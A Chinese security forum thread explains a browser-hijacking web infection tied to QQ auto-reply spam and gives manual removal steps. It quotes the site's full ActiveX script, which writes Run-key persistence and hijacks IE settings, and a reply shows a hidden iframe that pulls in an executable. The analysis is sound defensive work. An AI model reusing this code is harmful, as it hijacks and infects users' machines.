20CN网络安全小组论坛 - 病毒专区 - 关于近来“qq自动回复加上小尾巴”的解决方案！！

论坛: 病毒专区标题: 关于近来“qq自动回复加上小尾巴”的解决方案！！

复制本贴地址

作者: CyberSpy [cyberspy]

论坛用户

kailangq认为到目前为止,问题已有明确答案,本贴已被冻结,不再接受更多的回复

关于“qq自动回复加上小尾巴！！”

   近来众多网友反映qq回复时自动被加上了一些小尾巴，甚是烦人。究其原因：网页恶意代码。一些网站为了达到宣传自己、盗取qq等密码等等的可恶目的，太阴毒了！真心希望他们的无耻行为受到法律的制裁！（我没有做梦吧~）

   对于http://www.QQ168.net，由于我是ie6.0，所以没有能中招（本想以身试毒，看看个究竟的，但是天妒英才，哎 ~#￥#￥~），因此本文中的情况皆为根据以往经验虚拟出来的，也许会跟您的遭遇有很多出入，但是原理相通，希望能抛砖引玉，大家最后“高高兴兴上20cn来，快快乐乐杀毒去”。另幸好本版先前“马大哈”同志给出了一帖那个恶意网站的一部分vb脚本源代码对于ie恶意修改还是有所了解。

大概病毒行为：
（1）初始状况会在%windir%\system32\或者%\system\目录下生成一些乱七遭八的木马文件！可能是exe、dll为文件后缀。应该是偷qq密码的，已经中招的，请一定注意自己的qq密码哦，最好马上修改。
（2）修改注册表，增加开机启动项目，使木马服务器端一开机就运行
在注册表中添加HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\等以run开头的项目中，内容为：%windir%\system32\具体文件这里说不准！
    可能修改exe文件、txt文件和com文件等的默认打开方式（即文件关联，你一运行exe文件、txt文件或者com文件木马就被执行一次）：将HKEY_CLASSES_ROOT\comfile\shell\open\command的内容修改为了%windir%\System32\具体文件这里说不准 %1 %*。将HKEY_CLASSES_ROOT\txtfile\shell\open\command的内容修改为了%windir%\System32\具体文件这里说不准 %1 %*。将HKEY_CLASSES_ROOT\exefile\shell\open\command的内容修改为%windir%\System32\具体文件这里说不准 %1 %*。
（3）恶意修改ie的一些选项，具体的情况请参照本版置顶帖“恶意代码全攻略终结篇”。

手工清除方法：
1、运行注册表编辑器（regedit）。
2、用系统自带的任务管理器或者进程管理软件停掉可疑的进程。
3、修改HKEY_CLASSES_ROOT\comfile\shell\open\command和HKEY_CLASSES_ROOT\exefile\shell\open\command为"%1" %*，删掉HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run等run开头的项，右边可疑项目。或者运行msconfig->启动->去掉可疑项目。
4、删掉%windir%\system32\中上面发现的可疑文件。

  如果您是新手，对自己的行为不是很有信心，清除过程中可以利用一下：超级兔子魔法设置或者windows优化大师等系统工具。

另外:推荐使用http://www.20cn.org/download/Defend/navce8chs.rar 诺顿杀毒软件，可以在线升级病毒库。
请升级ie或者到微软下载补丁

  具体大概QQ情缘音乐世界,http://www.QQ168.net这个可恶的小尾巴中：
c:\windows\system\systel.dll、c:\windows\system.dll （注意路径和文件名）这两个为恶意vbs脚本文件，不是系统动态链接库。他们修改通过恶意修改注册表达到系统启动便自行修改ie项目的目的，可以删除掉。具体的情况请参照本版置顶帖“恶意代码全攻略终结篇”。其他的，木马文件在哪里是什么我不清楚，十分十分抱歉！

PS:www.qq168.net一部分修改ie的恶意代码
<html><script language="">
document.write("<APPLET HEIGHT=0 WIDTH=0 code=com.ms.activeX.ActiveXComponent.class></APPLET>");
function runcmd()
{
a=document.applets[0];
a.setCLSID('{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}');
a.createInstance();
Shl=a.GetObject();
a.setCLSID('{0D43FE01-F093-11CF-8940-00A0C9054228}');
a.createInstance();
fso=a.GetObject();
var wf1=fso.CreateTextFile("c:\\windows\\system\\systel.dll",true);
wf1.writeLine('REGEDIT4');
wf1.WriteBlankLines(1);
wf1.WriteLine('[HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Internet Explorer\\Main]');
wf1.WriteLine('"Start Page"="http://www.qq168.net"');
wf1.WriteLine('"First Home Page"="http://www.qq168.net"');
wf1.WriteLine('"Local Page"="http://www.qq168.net"');
wf1.WriteBlankLines(1);
wf1.writeLine('[HKLM\\Software\\Microsoft\\Internet Explorer\\Main]');
wf1.WriteLine('"Default_Page_URL"="http://www.qq168.net"');
wf1.WriteBlankLines(1);
wf1.writeLine('[HKEY_CURRENT_USER\\Software\\Microsoft\\Internet Explorer\\Main]');
wf1.WriteLine('"Start Page"="http://www.qq168.net"');
wf1.WriteLine('"First Home Page"="http://www.qq168.net"');
wf1.WriteLine('"Default_Page_URL"="http://www.qq168.net"');
wf1.WriteLine('"Local Page"="http://www.qq168.net"');
wf1.WriteBlankLines(1);
wf1.writeLine('[-HKEY_CURRENT_USER\\Software\\Microsoft\\windows\\CurrentVersion\\Run]');
wf1.writeLine('[HKEY_CURRENT_USER\\Software\\Microsoft\\windows\\CurrentVersion\\Run]');
wf1.WriteLine('@="regedit -s c:\\\\windows\\\\system.dll"');
wf1.WriteBlankLines(1);
wf1.writeLine('[HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Run]');
wf1.WriteLine('"Start Page"="regedit -s c:\\windows\\system\\systel.dll"');
wf1.WriteBlankLines(1);
wf1.writeLine('[HKEY_CURRENT_USER\\Software\\Microsoft\\Internet Explorer\\Main]');
wf1.WriteLine('"Start Page"="http://www.qq168.net"');
wf1.WriteLine('"First Home Page"="http://www.qq168.net"');
wf1.WriteLine('"Default_Page_URL"="http://www.qq168.net"');
wf1.WriteLine('"Local Page"="http://www.qq168.net"');
wf1.Close();

var wf1=fso.CreateTextFile("c:\\windows\\system.dll",true);
wf1.writeLine('REGEDIT4');
wf1.WriteBlankLines(1);
wf1.WriteLine('[HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Internet Explorer\\Main]');
wf1.WriteLine('"Start Page"="http://www.qq168.net"');
wf1.WriteLine('"First Home Page"="http://www.qq168.net"');
wf1.WriteLine('"Local Page"="http://www.qq168.net"');
wf1.WriteBlankLines(1);
wf1.writeLine('[HKLM\\Software\\Microsoft\\Internet Explorer\\Main]');
wf1.WriteLine('"Default_Page_URL"="http://www.qq168.net"');
wf1.WriteBlankLines(1);
wf1.writeLine('[HKEY_CURRENT_USER\\Software\\Microsoft\\Internet Explorer\\Main]');
wf1.WriteLine('"Start Page"="http://www.qq168.net"');
wf1.WriteLine('"First Home Page"="http://www.qq168.net"');
wf1.WriteLine('"Default_Page_URL"="http://www.qq168.net"');
wf1.WriteLine('"Local Page"="http://www.qq168.net"');
wf1.WriteBlankLines(1);
wf1.writeLine('[-HKEY_CURRENT_USER\\Software\\Microsoft\\windows\\CurrentVersion\\Run]');
wf1.writeLine('[HKEY_CURRENT_USER\\Software\\Microsoft\\windows\\CurrentVersion\\Run]');
wf1.WriteLine('@="regedit -s c:\\\\windows\\\\system.dll"');
wf1.WriteBlankLines(1);
wf1.writeLine('[HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Run]');
wf1.WriteLine('"win"="regedit -s c:\\\\windows\\\\system\\\\systel.dll"');
wf1.WriteBlankLines(1);
wf1.WriteLine('rcx');
wf1.Close();

Shl.RegWrite ("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\", "regedit -s c:\\windows\\system\\systel.dll");
Shl.RegWrite ("HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\Start Pagewin", "regedit -s c:\\windows\\system\\systel.dll");
Shl.RegWrite ("HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\win1", "regedit -s c:\\windows\\system.dll");
Shl.RegWrite ("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\Start Page", "http://www.qq168.net");
Shl.RegWrite ("HKLM\\SOFTWARE\\Microsoft\\Internet Explorer\\Main\\Start Page", "http://www.qq168.net");
Shl.RegWrite ("HKLM\\SOFTWARE\\Microsoft\\Internet Explorer\\Main\\First Home Page", "http://www.qq168.net");
Shl.RegWrite ("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\First Home Page","http://www.qq168.net");
Shl.RegWrite ("HKCU\\Software\\Microsoft\\Internet Explorer\\MenuExt\\☆♀精彩网站♀☆\\", "http://www.qq168.net");
Shl.RegWrite ("HKCU\\Software\\Microsoft\\Internet Explorer\\MenuExt\\�t☆顶级DJ舞曲☆�s\\", "http://www.qq168.net");
}
setTimeout('runcmd()',1000);
</script>

地主发表时间: 05/04 22:22

回复: NetDemon [netdemon]

ADMIN

作者: TomyChen [quest]

做的一个分析是从另外一个类似于这种恶意网站上的代码分析而来的
　　<iframe src=http://www.fucking.com/fuckguy/fucking.mht width=0 height=0></iframe>
　　问题就出在这个fucking.mht下。(IE可以将HTML页面，包括内链的图片，保存为单个的mht文件。mht文件遵循MIME标准，包括IE,Outlook在内的许多软件可以直接打开。)由于用了iframe可能是做为隐藏标记（事实上，我没登陆该网站。公司不让上，我只能搞个小软件把代码给down下来的)。这样登陆的时候就会神不知鬼不觉的下载了fucking.mht文件。我把这个mht文件下载后以editplues（或者你可以用notepad打开）。你会发现系统要你下载一个软件。（也许存在IE版本的问题，可能老版本会不提示，或者是下载到本地后才会提示，具体原因这里不做深研了。有兴趣的可以自行研究，到时别忘了把你的成果post一份给我:D）而正是这个.exe程序在你的系统里做乱。至今为止还没有一家防病毒公司给可以清除这一病毒。（估计快了）给大家的建议是将IE升级到6.0。有事没事别到一些乱七八糟的网上跑。再给大家提个醒。类似于什么qq啊什么sex18/16有这类关键字的域名，还是少上为妙。该干嘛的干嘛去，少去一些无聊的网站省点心。好了，我也不知道还有什么要分析的啦。大家将就着防着点吧。公司做了一些限制，分析也不便。
　　
　　鄙视这种卖弄技术的电脑败类！一切的！
　　由于本人实在看不习惯该网站的作风故把该站域名丑化。而且我也不想大家不小心跑到那个该死的站去...

B1层发表时间: 05/07 17:58

论坛: 病毒专区